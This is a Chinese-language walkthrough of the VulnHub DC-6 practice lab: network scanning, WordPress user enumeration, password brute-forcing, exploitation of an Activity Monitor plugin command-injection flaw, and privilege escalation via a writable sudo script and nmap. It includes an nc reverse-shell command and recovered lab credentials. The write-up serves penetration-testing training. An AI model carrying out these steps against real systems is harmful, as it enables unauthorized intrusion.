vulnhub-wp DC-6
本文结构
-
🖳 主机发现(Host Discover) -
👁 端口扫描(Port Scan) -
🚪🚶 获取权限 -
🛡️ 权限提升 -
📖 推荐文章
DC-6 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。这不是一个过于困难的挑战,因此对于初学者来说应该很棒。
🖳 主机发现
sudo netdiscover -i eth0 -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
21 Captured ARP Req/Rep packets, from 6 hosts. Total size: 1260
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.5 20:1e:88:ad:fc:55 1 60 Intel Corporate
192.168.1.14 08:00:27:e2:b6:88 1 60 PCS Systemtechnik GmbH
192.168.1.3 a2:86:90:e6:04:98 1 60 Unknown vendor
目标是192.168.1.14
👁 服务扫描
# Nmap 7.94SVN scan initiated Fri Feb 16 15:50:20 2024 as: nmap -p- -oN nmap_scan -sV -sC --min-rate 5000 192.168.1.14
Nmap scan report for 192.168.1.14 (192.168.1.14)
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:E2:B6:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 16 15:50:28 2024 -- 1 IP address (1 host up) scanned in 8.69 seconds
发现重定向到http://wordy/这个网站,我们把它加入hosts文件中 发现主页是一个wordpress网站,对其进行扫描
wpscan -e vt,vp,u --url http://wordy/
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
发现了很多用户,记录下来,然后尝试一下登录界面的弱口令,没有试出弱口令,那就尝试爆破,因为爆破路径也没有什么有趣的,那攻击向量只有web喝ssh,web又只有这个登录页面是暴露的。 根据作者的提示,生成一下密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
尝试爆破
wpscan --url http://wordy -U users -P passwords.txt
得到了凭证
mark:helpdesk01
🚪🚶 获取权限
登录上之后,发现有一个Activity Monitor,搜索一下有没有漏洞
searchsploit Activity
···
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection | php/webapps/45274.html
WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) | php/webapps/50110.py
···
我们使用下面那个,执行之后输入ip,username,password,然后用nc反弹shell。
nc -e /bin/bash 192.168.1.13 443
🛡️ 提升权限
用linpeas.sh辅助提权脚本枚举信息
这里有俩个有趣的文件,我们可以在things-to-do.txt中发现用户gaham的凭证
我们用ssh登录上去,后进行一些枚举,发现可以以jens身份运行backups.sh脚本,且因为gaham用户是devs组,对该脚本有修改权限,我们可以在里面加一个/bin/bash来启动一个jens用户的shell
sudo -u jens ./backups.sh
或者jens的shell后,再次使用sudo -l进行检查
然后在GTFOBins搜索nmaphttps://gtfobins.github.io/gtfobins/nmap/#sudo
最终拿到root的shell
📖 推荐文章
DC-6下载地址https://www.vulnhub.com/entry/dc-6,315/
DC-6国外大佬walkthrough文章https://www.sevenlayers.com/index.php/194-vulnhub-dc-6-walkthrough
GTFOBins地址https://gtfobins.github.io/
个人博客地址https://rightevil.github.io/
原文始发于微信公众号(入特安全):Vulnub-wp DC-6
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论